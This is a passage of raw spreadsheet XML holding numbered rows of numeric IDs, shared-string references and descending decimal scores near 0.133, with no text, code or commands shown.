        <v>1.0</v>
      </c>
      <c r="E5816" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5816" s="2">
        <v>0.1342592592592593</v>
      </c>
    </row>
    <row r="5817" ht="15.75" customHeight="1">
      <c r="A5817" s="1">
        <v>12905.0</v>
      </c>
      <c r="B5817" s="2">
        <v>3.2088606E7</v>
      </c>
      <c r="C5817" s="2" t="s">
        <v>5550</v>
      </c>
      <c r="D5817" s="2">
        <v>1.0</v>
      </c>
      <c r="E5817" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5817" s="2">
        <v>0.1342592592592593</v>
      </c>
    </row>
    <row r="5818" ht="15.75" customHeight="1">
      <c r="A5818" s="1">
        <v>21070.0</v>
      </c>
      <c r="B5818" s="2">
        <v>1.7890299E7</v>
      </c>
      <c r="C5818" s="2" t="s">
        <v>5511</v>
      </c>
      <c r="D5818" s="2">
        <v>1.0</v>
      </c>
      <c r="E5818" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5818" s="2">
        <v>0.1342592592592593</v>
      </c>
    </row>
    <row r="5819" ht="15.75" customHeight="1">
      <c r="A5819" s="1">
        <v>23146.0</v>
      </c>
      <c r="B5819" s="2">
        <v>5.1751559E7</v>
      </c>
      <c r="C5819" s="2" t="s">
        <v>5551</v>
      </c>
      <c r="D5819" s="2">
        <v>1.0</v>
      </c>
      <c r="E5819" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5819" s="2">
        <v>0.1342592592592593</v>
      </c>
    </row>
    <row r="5820" ht="15.75" customHeight="1">
      <c r="A5820" s="1">
        <v>26441.0</v>
      </c>
      <c r="B5820" s="2">
        <v>1.7268039E7</v>
      </c>
      <c r="C5820" s="2" t="s">
        <v>5552</v>
      </c>
      <c r="D5820" s="2">
        <v>1.0</v>
      </c>
      <c r="E5820" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5820" s="2">
        <v>0.1342592592592593</v>
      </c>
    </row>
    <row r="5821" ht="15.75" customHeight="1">
      <c r="A5821" s="1">
        <v>31323.0</v>
      </c>
      <c r="B5821" s="2">
        <v>4973765.0</v>
      </c>
      <c r="C5821" s="2" t="s">
        <v>5553</v>
      </c>
      <c r="D5821" s="2">
        <v>1.0</v>
      </c>
      <c r="E5821" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5821" s="2">
        <v>0.1342592592592592</v>
      </c>
    </row>
    <row r="5822" ht="15.75" customHeight="1">
      <c r="A5822" s="1">
        <v>24995.0</v>
      </c>
      <c r="B5822" s="2">
        <v>1.2690786E7</v>
      </c>
      <c r="C5822" s="2" t="s">
        <v>5554</v>
      </c>
      <c r="D5822" s="2">
        <v>1.0</v>
      </c>
      <c r="E5822" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5822" s="2">
        <v>0.1339285714285715</v>
      </c>
    </row>
    <row r="5823" ht="15.75" customHeight="1">
      <c r="A5823" s="1">
        <v>33872.0</v>
      </c>
      <c r="B5823" s="2">
        <v>9106050.0</v>
      </c>
      <c r="C5823" s="2" t="s">
        <v>5555</v>
      </c>
      <c r="D5823" s="2">
        <v>1.0</v>
      </c>
      <c r="E5823" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5823" s="2">
        <v>0.1339285714285715</v>
      </c>
    </row>
    <row r="5824" ht="15.75" customHeight="1">
      <c r="A5824" s="1">
        <v>14770.0</v>
      </c>
      <c r="B5824" s="2">
        <v>4.0861512E7</v>
      </c>
      <c r="C5824" s="2" t="s">
        <v>5556</v>
      </c>
      <c r="D5824" s="2">
        <v>1.0</v>
      </c>
      <c r="E5824" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5824" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="5825" ht="15.75" customHeight="1">
      <c r="A5825" s="1">
        <v>16040.0</v>
      </c>
      <c r="B5825" s="2">
        <v>4.5136618E7</v>
      </c>
      <c r="C5825" s="2" t="s">
        <v>5557</v>
      </c>
      <c r="D5825" s="2">
        <v>1.0</v>
      </c>
      <c r="E5825" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5825" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="5826" ht="15.75" customHeight="1">
      <c r="A5826" s="1">
        <v>24544.0</v>
      </c>
      <c r="B5826" s="2">
        <v>1.1223112E7</v>
      </c>
      <c r="C5826" s="2" t="s">
        <v>5558</v>
      </c>
      <c r="D5826" s="2">
        <v>1.0</v>
      </c>
      <c r="E5826" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5826" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="5827" ht="15.75" customHeight="1">
      <c r="A5827" s="1">
        <v>26837.0</v>
      </c>
      <c r="B5827" s="2">
        <v>1.8910117E7</v>
      </c>
      <c r="C5827" s="2" t="s">
        <v>5559</v>
      </c>
      <c r="D5827" s="2">
        <v>1.0</v>
      </c>
      <c r="E5827" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5827" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="5828" ht="15.75" customHeight="1">
      <c r="A5828" s="1">
        <v>27502.0</v>
      </c>
      <c r="B5828" s="2">
        <v>2.2093503E7</v>
      </c>
      <c r="C5828" s="2" t="s">
        <v>5560</v>
      </c>
      <c r="D5828" s="2">
        <v>1.0</v>
      </c>
      <c r="E5828" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5828" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="5829" ht="15.75" customHeight="1">
      <c r="A5829" s="1">
        <v>29063.0</v>
      </c>
      <c r="B5829" s="2">
        <v>3.025761E7</v>
      </c>
      <c r="C5829" s="2" t="s">
        <v>5561</v>
      </c>
      <c r="D5829" s="2">
        <v>1.0</v>
      </c>
      <c r="E5829" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5829" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="5830" ht="15.75" customHeight="1">
      <c r="A5830" s="1">
        <v>29459.0</v>
      </c>
      <c r="B5830" s="2">
        <v>3.2308905E7</v>
      </c>
      <c r="C5830" s="2" t="s">
        <v>5562</v>
      </c>
      <c r="D5830" s="2">
        <v>1.0</v>
      </c>
      <c r="E5830" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5830" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="5831" ht="15.75" customHeight="1">
      <c r="A5831" s="1">
        <v>30753.0</v>
      </c>
      <c r="B5831" s="2">
        <v>4.4173153E7</v>
      </c>
      <c r="C5831" s="2" t="s">
        <v>5563</v>
      </c>
      <c r="D5831" s="2">
        <v>1.0</v>
      </c>
      <c r="E5831" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5831" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="5832" ht="15.75" customHeight="1">
      <c r="A5832" s="1">
        <v>32371.0</v>
      </c>
      <c r="B5832" s="2">
        <v>5602244.0</v>
      </c>
      <c r="C5832" s="2" t="s">
        <v>5564</v>
      </c>
      <c r="D5832" s="2">
        <v>1.0</v>
      </c>
      <c r="E5832" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5832" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="5833" ht="15.75" customHeight="1">
      <c r="A5833" s="1">
        <v>32392.0</v>
      </c>
      <c r="B5833" s="2">
        <v>5624549.0</v>
      </c>
      <c r="C5833" s="2" t="s">
        <v>5565</v>
      </c>
      <c r="D5833" s="2">
        <v>1.0</v>
      </c>
      <c r="E5833" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5833" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="5834" ht="15.75" customHeight="1">
      <c r="A5834" s="1">
        <v>33201.0</v>
      </c>
      <c r="B5834" s="2">
        <v>7165334.0</v>
      </c>
      <c r="C5834" s="2" t="s">
        <v>5566</v>
      </c>
      <c r="D5834" s="2">
        <v>1.0</v>
      </c>
      <c r="E5834" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5834" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="5835" ht="15.75" customHeight="1">
      <c r="A5835" s="1">
        <v>33754.0</v>
      </c>
      <c r="B5835" s="2">
        <v>8595986.0</v>
      </c>
      <c r="C5835" s="2" t="s">
        <v>5567</v>
      </c>
      <c r="D5835" s="2">
        <v>1.0</v>
      </c>
      <c r="E5835" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5835" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="5836" ht="15.75" customHeight="1">
      <c r="A5836" s="1">
        <v>16158.0</v>
      </c>
      <c r="B5836" s="2">
        <v>4.5577814E7</v>
      </c>
      <c r="C5836" s="2" t="s">
        <v>5568</v>
      </c>
      <c r="D5836" s="2">
        <v>1.0</v>
      </c>
      <c r="E5836" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5836" s="2">
        <v>0.1335282651072125</v>
      </c>
    </row>
    <row r="5837" ht="15.75" customHeight="1">
      <c r="A5837" s="1">
        <v>23276.0</v>
      </c>
      <c r="B5837" s="2">
        <v>5362147.0</v>
      </c>
      <c r="C5837" s="2" t="s">
        <v>5569</v>
      </c>
      <c r="D5837" s="2">
        <v>1.0</v>
      </c>
      <c r="E5837" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5837" s="2">
        <v>0.1335282651072125</v>
      </c>
    </row>
    <row r="5838" ht="15.75" customHeight="1">
      <c r="A5838" s="1">
        <v>23829.0</v>
      </c>
      <c r="B5838" s="2">
        <v>8057479.0</v>
      </c>
      <c r="C5838" s="2" t="s">
        <v>5570</v>
      </c>
      <c r="D5838" s="2">
        <v>1.0</v>
      </c>
      <c r="E5838" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5838" s="2">
        <v>0.1335282651072125</v>
      </c>
    </row>
    <row r="5839" ht="15.75" customHeight="1">
      <c r="A5839" s="1">
        <v>26427.0</v>
      </c>
      <c r="B5839" s="2">
        <v>1.7155444E7</v>
      </c>
      <c r="C5839" s="2" t="s">
        <v>5571</v>
      </c>
      <c r="D5839" s="2">
        <v>1.0</v>
      </c>
      <c r="E5839" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5839" s="2">
        <v>0.1335282651072125</v>
      </c>
    </row>
    <row r="5840" ht="15.75" customHeight="1">
      <c r="A5840" s="1">
        <v>26610.0</v>
      </c>
      <c r="B5840" s="2">
        <v>1.8014068E7</v>
      </c>
      <c r="C5840" s="2" t="s">
        <v>5572</v>
      </c>
      <c r="D5840" s="2">
        <v>1.0</v>
      </c>
      <c r="E5840" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5840" s="2">
        <v>0.1335282651072125</v>
      </c>
    </row>
    <row r="5841" ht="15.75" customHeight="1">
      <c r="A5841" s="1">
        <v>30034.0</v>
      </c>
      <c r="B5841" s="2">
        <v>3620570.0</v>
      </c>
      <c r="C5841" s="2" t="s">
        <v>5573</v>
      </c>
      <c r="D5841" s="2">
        <v>1.0</v>
      </c>
      <c r="E5841" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5841" s="2">
        <v>0.1335282651072125</v>
      </c>
    </row>
    <row r="5842" ht="15.75" customHeight="1">
      <c r="A5842" s="1">
        <v>13753.0</v>
      </c>
      <c r="B5842" s="2">
        <v>3.6486449E7</v>
      </c>
      <c r="C5842" s="2" t="s">
        <v>5574</v>
      </c>
      <c r="D5842" s="2">
        <v>1.0</v>
      </c>
      <c r="E5842" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5842" s="2">
        <v>0.1335125448028674</v>
      </c>
    </row>
    <row r="5843" ht="15.75" customHeight="1">
      <c r="A5843" s="1">
        <v>24168.0</v>
      </c>
      <c r="B5843" s="2">
        <v>1.0197569E7</v>
      </c>
      <c r="C5843" s="2" t="s">
        <v>5575</v>
      </c>
      <c r="D5843" s="2">
        <v>1.0</v>
      </c>
      <c r="E5843" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5843" s="2">
        <v>0.1335125448028674</v>
      </c>
    </row>
    <row r="5844" ht="15.75" customHeight="1">
      <c r="A5844" s="1">
        <v>30592.0</v>
      </c>
      <c r="B5844" s="2">
        <v>4.1199834E7</v>
      </c>
      <c r="C5844" s="2" t="s">
        <v>5445</v>
      </c>
      <c r="D5844" s="2">
        <v>1.0</v>
      </c>
      <c r="E5844" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5844" s="2">
        <v>0.1335125448028674</v>
      </c>
    </row>
    <row r="5845" ht="15.75" customHeight="1">
      <c r="A5845" s="1">
        <v>32727.0</v>
      </c>
      <c r="B5845" s="2">
        <v>6002135.0</v>
      </c>
      <c r="C5845" s="2" t="s">
        <v>5576</v>
      </c>
      <c r="D5845" s="2">
        <v>1.0</v>
      </c>
      <c r="E5845" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5845" s="2">
        <v>0.1335125448028674</v>
      </c>
    </row>
    <row r="5846" ht="15.75" customHeight="1">
      <c r="A5846" s="1">
        <v>32873.0</v>
      </c>
      <c r="B5846" s="2">
        <v>6313394.0</v>
      </c>
      <c r="C5846" s="2" t="s">
        <v>5577</v>
      </c>
      <c r="D5846" s="2">
        <v>1.0</v>
      </c>
      <c r="E5846" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5846" s="2">
        <v>0.1334991708126037</v>
      </c>
    </row>
    <row r="5847" ht="15.75" customHeight="1">
      <c r="A5847" s="1">
        <v>32343.0</v>
      </c>
      <c r="B5847" s="2">
        <v>5591800.0</v>
      </c>
      <c r="C5847" s="2" t="s">
        <v>5578</v>
      </c>
      <c r="D5847" s="2">
        <v>1.0</v>
      </c>
      <c r="E5847" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5847" s="2">
        <v>0.1332138590203107</v>
      </c>
    </row>
    <row r="5848" ht="15.75" customHeight="1">
      <c r="A5848" s="1">
        <v>28818.0</v>
      </c>
      <c r="B5848" s="2">
        <v>2.8776512E7</v>
      </c>
      <c r="C5848" s="2" t="s">
        <v>5579</v>
      </c>
      <c r="D5848" s="2">
        <v>1.0</v>
      </c>
      <c r="E5848" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5848" s="2">
        <v>0.1331699346405229</v>
      </c>
    </row>
    <row r="5849" ht="15.75" customHeight="1">
      <c r="A5849" s="1">
        <v>31089.0</v>
      </c>
      <c r="B5849" s="2">
        <v>4.8412633E7</v>
      </c>
      <c r="C5849" s="2" t="s">
        <v>5579</v>
      </c>
      <c r="D5849" s="2">
        <v>1.0</v>
      </c>
      <c r="E5849" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5849" s="2">
        <v>0.1331699346405229</v>
      </c>
    </row>
    <row r="5850" ht="15.75" customHeight="1">
      <c r="A5850" s="1">
        <v>28834.0</v>
      </c>
      <c r="B5850" s="2">
        <v>2.888349E7</v>
      </c>
      <c r="C5850" s="2" t="s">
        <v>5580</v>
      </c>
      <c r="D5850" s="2">
        <v>1.0</v>
      </c>
      <c r="E5850" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5850" s="2">
        <v>0.1331569664902999</v>
      </c>
    </row>
    <row r="5851" ht="15.75" customHeight="1">
      <c r="A5851" s="1">
        <v>31318.0</v>
      </c>
      <c r="B5851" s="2">
        <v>4973474.0</v>
      </c>
      <c r="C5851" s="2" t="s">
        <v>5581</v>
      </c>
      <c r="D5851" s="2">
        <v>1.0</v>
      </c>
      <c r="E5851" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5851" s="2">
        <v>0.1331569664902999</v>
      </c>
    </row>
    <row r="5852" ht="15.75" customHeight="1">
      <c r="A5852" s="1">
        <v>24067.0</v>
      </c>
      <c r="B5852" s="2">
        <v>9645205.0</v>
      </c>
      <c r="C5852" s="2" t="s">
        <v>5582</v>
      </c>
      <c r="D5852" s="2">
        <v>1.0</v>
      </c>
      <c r="E5852" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5852" s="2">
        <v>0.1331417624521073</v>
      </c>
    </row>
    <row r="5853" ht="15.75" customHeight="1">
      <c r="A5853" s="1">
        <v>26215.0</v>
      </c>
      <c r="B5853" s="2">
        <v>1.6252774E7</v>
      </c>
      <c r="C5853" s="2" t="s">
        <v>5583</v>
      </c>
      <c r="D5853" s="2">
        <v>1.0</v>
      </c>
      <c r="E5853" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5853" s="2">
        <v>0.1331417624521073</v>
      </c>
    </row>
    <row r="5854" ht="15.75" customHeight="1">
      <c r="A5854" s="1">
        <v>28694.0</v>
      </c>
      <c r="B5854" s="2">
        <v>2.7664868E7</v>
      </c>
      <c r="C5854" s="2" t="s">
        <v>5584</v>
      </c>
      <c r="D5854" s="2">
        <v>1.0</v>
      </c>
      <c r="E5854" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5854" s="2">
        <v>0.1331417624521073</v>
      </c>
    </row>
    <row r="5855" ht="15.75" customHeight="1">
      <c r="A5855" s="1">
        <v>32493.0</v>
      </c>
      <c r="B5855" s="2">
        <v>5.7034533E7</v>
      </c>
      <c r="C5855" s="2" t="s">
        <v>5585</v>
      </c>
      <c r="D5855" s="2">
        <v>1.0</v>
      </c>
      <c r="E5855" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5855" s="2">
        <v>0.1331417624521073</v>
      </c>
    </row>
    <row r="5856" ht="15.75" customHeight="1">
      <c r="A5856" s="1">
        <v>28541.0</v>
      </c>
      <c r="B5856" s="2">
        <v>2.684247E7</v>
      </c>
      <c r="C5856" s="2" t="s">
        <v>5586</v>
      </c>
      <c r="D5856" s="2">
        <v>1.0</v>
      </c>
      <c r="E5856" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5856" s="2">
        <v>0.1328502415458938</v>
      </c>
    </row>
    <row r="5857" ht="15.75" customHeight="1">
      <c r="A5857" s="1">
        <v>26027.0</v>
      </c>
      <c r="B5857" s="2">
        <v>1.5388267E7</v>
      </c>
      <c r="C5857" s="2" t="s">
        <v>5587</v>
      </c>
      <c r="D5857" s="2">
        <v>1.0</v>
      </c>
      <c r="E5857" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5857" s="2">
        <v>0.1327683615819209</v>
      </c>
    </row>
    <row r="5858" ht="15.75" customHeight="1">
      <c r="A5858" s="1">
        <v>27664.0</v>
      </c>
      <c r="B5858" s="2">
        <v>2.2914161E7</v>
      </c>
      <c r="C5858" s="2" t="s">
        <v>5588</v>
      </c>
      <c r="D5858" s="2">
        <v>1.0</v>
      </c>
      <c r="E5858" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5858" s="2">
        <v>0.1327683615819209</v>
      </c>
    </row>
    <row r="5859" ht="15.75" customHeight="1">
      <c r="A5859" s="1">
        <v>29236.0</v>
      </c>
      <c r="B5859" s="2">
        <v>3.0839551E7</v>
      </c>
      <c r="C5859" s="2" t="s">
        <v>5589</v>
      </c>
      <c r="D5859" s="2">
        <v>1.0</v>
      </c>
      <c r="E5859" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5859" s="2">
        <v>0.1327683615819209</v>
      </c>
    </row>
    <row r="5860" ht="15.75" customHeight="1">
      <c r="A5860" s="1">
        <v>32478.0</v>
      </c>
      <c r="B5860" s="2">
        <v>5693677.0</v>
      </c>
      <c r="C5860" s="2" t="s">
        <v>5590</v>
      </c>
      <c r="D5860" s="2">
        <v>1.0</v>
      </c>
      <c r="E5860" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5860" s="2">
        <v>0.1327683615819209</v>
      </c>
    </row>
    <row r="5861" ht="15.75" customHeight="1">
      <c r="A5861" s="1">
        <v>272.0</v>
      </c>
      <c r="B5861" s="2">
        <v>1.5301643E7</v>
      </c>
      <c r="C5861" s="2" t="s">
        <v>5591</v>
      </c>
      <c r="D5861" s="2">
        <v>1.0</v>
      </c>
      <c r="E5861" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5861" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="5862" ht="15.75" customHeight="1">
      <c r="A5862" s="1">
        <v>20594.0</v>
      </c>
      <c r="B5862" s="2">
        <v>1.3813775E7</v>
      </c>
      <c r="C5862" s="2" t="s">
        <v>5592</v>
      </c>
      <c r="D5862" s="2">
        <v>1.0</v>
      </c>
      <c r="E5862" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5862" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="5863" ht="15.75" customHeight="1">
      <c r="A5863" s="1">
        <v>20641.0</v>
      </c>
      <c r="B5863" s="2">
        <v>1.4211842E7</v>
      </c>
      <c r="C5863" s="2" t="s">
        <v>5593</v>
      </c>
      <c r="D5863" s="2">
        <v>1.0</v>
      </c>
      <c r="E5863" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5863" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="5864" ht="15.75" customHeight="1">
      <c r="A5864" s="1">
        <v>21192.0</v>
      </c>
      <c r="B5864" s="2">
        <v>1.9325304E7</v>
      </c>
      <c r="C5864" s="2" t="s">
        <v>5594</v>
      </c>
      <c r="D5864" s="2">
        <v>1.0</v>
      </c>
      <c r="E5864" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5864" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="5865" ht="15.75" customHeight="1">
      <c r="A5865" s="1">
        <v>21709.0</v>
      </c>
      <c r="B5865" s="2">
        <v>2.5369023E7</v>
      </c>
      <c r="C5865" s="2" t="s">
        <v>5595</v>
      </c>
      <c r="D5865" s="2">
        <v>1.0</v>
      </c>
      <c r="E5865" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5865" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="5866" ht="15.75" customHeight="1">
      <c r="A5866" s="1">
        <v>22266.0</v>
      </c>
      <c r="B5866" s="2">
        <v>3.3103325E7</v>
      </c>
      <c r="C5866" s="2" t="s">
        <v>5596</v>
      </c>
      <c r="D5866" s="2">
        <v>1.0</v>
      </c>
      <c r="E5866" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5866" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="5867" ht="15.75" customHeight="1">
      <c r="A5867" s="1">
        <v>22395.0</v>
      </c>
      <c r="B5867" s="2">
        <v>3.5439384E7</v>
      </c>
      <c r="C5867" s="2" t="s">
        <v>5597</v>
      </c>
      <c r="D5867" s="2">
        <v>1.0</v>
      </c>
      <c r="E5867" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5867" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="5868" ht="15.75" customHeight="1">
      <c r="A5868" s="1">
        <v>23310.0</v>
      </c>
      <c r="B5868" s="2">
        <v>5.4148415E7</v>
      </c>
      <c r="C5868" s="2" t="s">
        <v>5598</v>
      </c>
      <c r="D5868" s="2">
        <v>1.0</v>
      </c>
      <c r="E5868" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5868" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="5869" ht="15.75" customHeight="1">
      <c r="A5869" s="1">
        <v>23625.0</v>
      </c>
      <c r="B5869" s="2">
        <v>6546494.0</v>
      </c>
      <c r="C5869" s="2" t="s">
        <v>5599</v>
      </c>
      <c r="D5869" s="2">
        <v>1.0</v>
      </c>
      <c r="E5869" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5869" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="5870" ht="15.75" customHeight="1">
      <c r="A5870" s="1">
        <v>25522.0</v>
      </c>
      <c r="B5870" s="2">
        <v>1.4211841E7</v>
      </c>
      <c r="C5870" s="2" t="s">
        <v>5593</v>
      </c>
      <c r="D5870" s="2">
        <v>1.0</v>
      </c>
      <c r="E5870" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5870" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="5871" ht="15.75" customHeight="1">
      <c r="A5871" s="1">
        <v>26025.0</v>
      </c>
      <c r="B5871" s="2">
        <v>1.5386361E7</v>
      </c>
      <c r="C5871" s="2" t="s">
        <v>5600</v>
      </c>
      <c r="D5871" s="2">
        <v>1.0</v>
      </c>
      <c r="E5871" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5871" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="5872" ht="15.75" customHeight="1">
      <c r="A5872" s="1">
        <v>26669.0</v>
      </c>
      <c r="B5872" s="2">
        <v>1.8062124E7</v>
      </c>
      <c r="C5872" s="2" t="s">
        <v>5601</v>
      </c>
      <c r="D5872" s="2">
        <v>1.0</v>
      </c>
      <c r="E5872" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5872" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="5873" ht="15.75" customHeight="1">
      <c r="A5873" s="1">
        <v>26673.0</v>
      </c>
      <c r="B5873" s="2">
        <v>1.8075693E7</v>
      </c>
      <c r="C5873" s="2" t="s">
        <v>5601</v>
      </c>
      <c r="D5873" s="2">
        <v>1.0</v>
      </c>
      <c r="E5873" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5873" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="5874" ht="15.75" customHeight="1">
      <c r="A5874" s="1">
        <v>26678.0</v>
      </c>
      <c r="B5874" s="2">
        <v>1.8075693E7</v>
      </c>
      <c r="C5874" s="2" t="s">
        <v>5601</v>
      </c>
      <c r="D5874" s="2">
        <v>1.0</v>
      </c>
      <c r="E5874" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5874" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="5875" ht="15.75" customHeight="1">
      <c r="A5875" s="1">
        <v>26682.0</v>
      </c>
      <c r="B5875" s="2">
        <v>1.8100506E7</v>
      </c>
      <c r="C5875" s="2" t="s">
        <v>5602</v>
      </c>
      <c r="D5875" s="2">
        <v>1.0</v>
      </c>
      <c r="E5875" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5875" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="5876" ht="15.75" customHeight="1">
      <c r="A5876" s="1">
        <v>28164.0</v>
      </c>
      <c r="B5876" s="2">
        <v>2.4930351E7</v>
      </c>
      <c r="C5876" s="2" t="s">
        <v>5603</v>
      </c>
      <c r="D5876" s="2">
        <v>1.0</v>
      </c>
      <c r="E5876" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5876" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="5877" ht="15.75" customHeight="1">
      <c r="A5877" s="1">
        <v>28266.0</v>
      </c>
      <c r="B5877" s="2">
        <v>2.5369022E7</v>
      </c>
      <c r="C5877" s="2" t="s">
        <v>5595</v>
      </c>
      <c r="D5877" s="2">
        <v>1.0</v>
      </c>
      <c r="E5877" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5877" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="5878" ht="15.75" customHeight="1">
      <c r="A5878" s="1">
        <v>28508.0</v>
      </c>
      <c r="B5878" s="2">
        <v>2.6728483E7</v>
      </c>
      <c r="C5878" s="2" t="s">
        <v>5604</v>
      </c>
      <c r="D5878" s="2">
        <v>1.0</v>
      </c>
      <c r="E5878" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5878" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="5879" ht="15.75" customHeight="1">
      <c r="A5879" s="1">
        <v>29554.0</v>
      </c>
      <c r="B5879" s="2">
        <v>3.3103324E7</v>
      </c>
      <c r="C5879" s="2" t="s">
        <v>5596</v>
      </c>
      <c r="D5879" s="2">
        <v>1.0</v>
      </c>
      <c r="E5879" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5879" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="5880" ht="15.75" customHeight="1">
      <c r="A5880" s="1">
        <v>29844.0</v>
      </c>
      <c r="B5880" s="2">
        <v>3.5671184E7</v>
      </c>
      <c r="C5880" s="2" t="s">
        <v>5605</v>
      </c>
      <c r="D5880" s="2">
        <v>1.0</v>
      </c>
      <c r="E5880" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5880" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="5881" ht="15.75" customHeight="1">
      <c r="A5881" s="1">
        <v>29924.0</v>
      </c>
      <c r="B5881" s="2">
        <v>3607052.0</v>
      </c>
      <c r="C5881" s="2" t="s">
        <v>5606</v>
      </c>
      <c r="D5881" s="2">
        <v>1.0</v>
      </c>
      <c r="E5881" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5881" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="5882" ht="15.75" customHeight="1">
      <c r="A5882" s="1">
        <v>30707.0</v>
      </c>
      <c r="B5882" s="2">
        <v>4273627.0</v>
      </c>
      <c r="C5882" s="2" t="s">
        <v>5607</v>
      </c>
      <c r="D5882" s="2">
        <v>1.0</v>
      </c>
      <c r="E5882" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5882" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="5883" ht="15.75" customHeight="1">
      <c r="A5883" s="1">
        <v>32136.0</v>
      </c>
      <c r="B5883" s="2">
        <v>5.4148414E7</v>
      </c>
      <c r="C5883" s="2" t="s">
        <v>5608</v>
      </c>
      <c r="D5883" s="2">
        <v>1.0</v>
      </c>
      <c r="E5883" s="3" t="s">
        <v>4878</v>
      </c>
